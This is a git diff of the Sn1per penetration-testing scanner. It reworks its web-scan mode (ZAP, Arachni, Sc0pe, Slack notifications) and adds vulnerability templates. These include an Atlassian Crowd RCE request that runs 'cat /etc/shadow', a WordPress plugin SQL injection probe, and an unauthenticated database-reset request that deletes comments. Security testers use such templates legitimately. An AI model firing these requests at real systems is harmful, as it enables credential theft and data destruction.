ls -lh $LOOT_DIR/scans/running-*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
SSL="false"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-scan.sh
|
||||
source $INSTALL_DIR/modes/sc0pe-active-scan.sh
|
||||
SSL="true"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-scan.sh
|
||||
source $INSTALL_DIR/modes/sc0pe-active-scan.sh
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
fi
|
||||
|
||||
if [[ "$BURP_SCAN" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
|
||||
|
|
@ -103,12 +91,14 @@ if [[ "$MODE" = "webscan" ]]; then
|
|||
sudo python3 /usr/share/sniper/bin/zap-scan.py "http://$TARGET/"
|
||||
DATE=$(date +"%Y%m%d%H%M")
|
||||
sudo grep "'" /usr/share/sniper/bin/zap-report.txt | cut -d\' -f2 | cut -d\\ -f1 > $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html
|
||||
cp -f $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html $LOOT_DIR/web/zap-report-$TARGET-http.html 2> /dev/null
|
||||
echo "[i] Scan complete."
|
||||
echo "[+] Report saved to: $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html"
|
||||
sleep 5
|
||||
echo "[i] Scanning: https://$TARGET/"
|
||||
sudo python3 /usr/share/sniper/bin/zap-scan.py "https://$TARGET/"
|
||||
sudo grep "'" /usr/share/sniper/bin/zap-report.txt | cut -d\' -f2 | cut -d\\ -f1 > $LOOT_DIR/web/zap-report-$TARGET-https-$DATE.html
|
||||
cp -f $LOOT_DIR/web/zap-report-$TARGET-https-$DATE.html $LOOT_DIR/web/zap-report-$TARGET-https.html 2> /dev/null
|
||||
echo "[i] Scan complete."
|
||||
echo "[+] Report saved to: $LOOT_DIR/web/zap-report-$TARGET-https-$DATE.html"
|
||||
fi
|
||||
|
|
@ -116,16 +106,17 @@ if [[ "$MODE" = "webscan" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ARACHNI SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
DATE=$(date +"%Y%m%d%H%M")
|
||||
mkdir -p $LOOT_DIR/web/http-$TARGET/
|
||||
mkdir -p $LOOT_DIR/web/https-$TARGET/
|
||||
arachni --report-save-path=$LOOT_DIR/web/http-$TARGET/ --output-only-positives http://$TARGET | tee $LOOT_DIR/output/sniper-$TARGET-webscan-http-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
cp -f $LOOT_DIR/output/sniper-$TARGET-webscan-http-`date +"%Y%m%d%H%M"`.txt $LOOT_DIR/web/arachni-$TARGET-webscan-http-`date +"%Y%m%d%H%M"`.txt 2> /dev/null
|
||||
arachni --report-save-path=$LOOT_DIR/web/https-$TARGET/ --output-only-positives https://$TARGET | tee $LOOT_DIR/output/sniper-$TARGET-webscan-https-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
cp -f $LOOT_DIR/output/sniper-$TARGET-webscan-https-`date +"%Y%m%d%H%M"`.txt $LOOT_DIR/web/arachni-$TARGET-webscan-https-`date +"%Y%m%d%H%M"`.txt 2> /dev/null
|
||||
|
||||
arachni --report-save-path=$LOOT_DIR/web/http-$TARGET/ --output-only-positives http://$TARGET | tee $LOOT_DIR/output/sniper-$TARGET-webscan-http-${DATE}.txt
|
||||
cp -vf $LOOT_DIR/output/sniper-$TARGET-webscan-http-${DATE}.txt $LOOT_DIR/web/arachni-$TARGET-webscan-http.txt
|
||||
sleep 1
|
||||
arachni --report-save-path=$LOOT_DIR/web/https-$TARGET/ --output-only-positives https://$TARGET | tee $LOOT_DIR/output/sniper-$TARGET-webscan-https-${DATE}.txt
|
||||
cp -vf $LOOT_DIR/output/sniper-$TARGET-webscan-https-${DATE}.txt $LOOT_DIR/web/arachni-$TARGET-webscan-https.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS_ARACHNI_SCAN" == "1" ]]; then
|
||||
bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/output/sniper-$TARGET-webscan-http-`date +"%Y%m%d%H%M"`.txt"
|
||||
bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/output/sniper-$TARGET-webscan-https-`date +"%Y%m%d%H%M"`.txt"
|
||||
bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/output/sniper-$TARGET-webscan-http-$DATE.txt"
|
||||
bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/output/sniper-$TARGET-webscan-https-$DATE.txt"
|
||||
fi
|
||||
cd $LOOT_DIR/web/http-$TARGET/
|
||||
cd $LOOT_DIR/web/https-$TARGET/
|
||||
|
|
@ -137,15 +128,30 @@ if [[ "$MODE" = "webscan" ]]; then
|
|||
unzip arachni.zip
|
||||
cd $INSTALL_DIR
|
||||
fi
|
||||
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
SSL="false"
|
||||
PORT="80"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
|
||||
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
|
||||
SSL="true"
|
||||
PORT="443"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
|
||||
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
|
||||
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
|
||||
source $file
|
||||
done
|
||||
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
|
||||
fi
|
||||
source $INSTALL_DIR/modes/sc0pe.sh
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
|
||||
mv $LOOT_DIR/scans/running-$TARGET-webscan.txt $LOOT_DIR/scans/finished-$TARGET-webscan.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running-*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
|
|
|
|||
8
sniper
8
sniper
|
|
@ -569,6 +569,14 @@ function loot {
|
|||
find $LOOT_DIR/nmap/ -type f -size -1c -exec rm -f {} \;
|
||||
cd $LOOT_DIR
|
||||
if [[ -f $SNIPER_PRO ]]; then
|
||||
wc -l $LOOT_DIR/scans/notifications.txt 2> /dev/null | awk '{print $1}' > $LOOT_DIR/scans/notifications_total.txt 2> /dev/null
|
||||
cat $LOOT_DIR/scans/tasks-running.txt 2> /dev/null > $LOOT_DIR/scans/tasks-running_total.txt 2> /dev/null
|
||||
wc -l $LOOT_DIR/scans/tasks.txt 2> /dev/null | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/tasks_total.txt 2> /dev/null
|
||||
wc -l $LOOT_DIR/scans/scheduled/*.sh 2> /dev/null | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/scheduled_tasks_total.txt 2> /dev/null
|
||||
grep "Host\ status" $LOOT_DIR/scans/notifications.txt 2> /dev/null | wc -l | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/host_status_changes_total.txt 2> /dev/null
|
||||
grep "Port\ change" $LOOT_DIR/scans/notifications.txt 2> /dev/null | wc -l | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/port_changes_total.txt 2> /dev/null
|
||||
wc -l $LOOT_DIR/domains/domains_new-*.txt 2> /dev/null | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/domain_changes_total.txt 2> /dev/null
|
||||
cat $LOOT_DIR/web/dirsearch-new-*.txt $LOOT_DIR/web/spider-new-*.txt 2> /dev/null | wc -l | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/url_changes_total.txt 2> /dev/null
|
||||
if [[ -f "$LOOT_DIR/notes/notepad.html" ]]; then
|
||||
echo -n "" 2>/dev/null
|
||||
else
|
||||
|
|
|
|||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2019-11580 - Atlassian Crowd Data Center Unauthenticated RCE'
|
||||
URI='/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow'
|
||||
METHOD='GET'
|
||||
MATCH='root\:'
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-11530 - Wordpress Chop Slider 3 Plugin SQL Injection'
|
||||
URI='/wp-content/plugins/chopslider/get_script/index.php?id=1111111'
|
||||
METHOD='GET'
|
||||
MATCH='chopslider_id_1111111'
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-7048 - WP Database Reset 3.15 Unauthenticated Database Reset'
|
||||
URI='/wp-admin/admin-post.php?db-reset-tables%5B%5D=comments&db-reset-code=11111&db-reset-code-confirm=11111'
|
||||
METHOD='GET'
|
||||
MATCH='\/wp-admin\/'
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure -I"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
|
|
@ -1,3 +1,8 @@
|
|||
/CTCWebService/CTCWebServiceBean
|
||||
/CTCWebService/CTCWebServiceBean?wsdl
|
||||
/CTCWebService/Config1?wsdl
|
||||
UploadTest.aspx
|
||||
ReportServer/pages/ReportViewer.aspx
|
||||
$defaultview?Readviewentries
|
||||
actuator/env
|
||||
actuator/health
|
||||
|
|
|
|||
Loading…
Reference in New Issue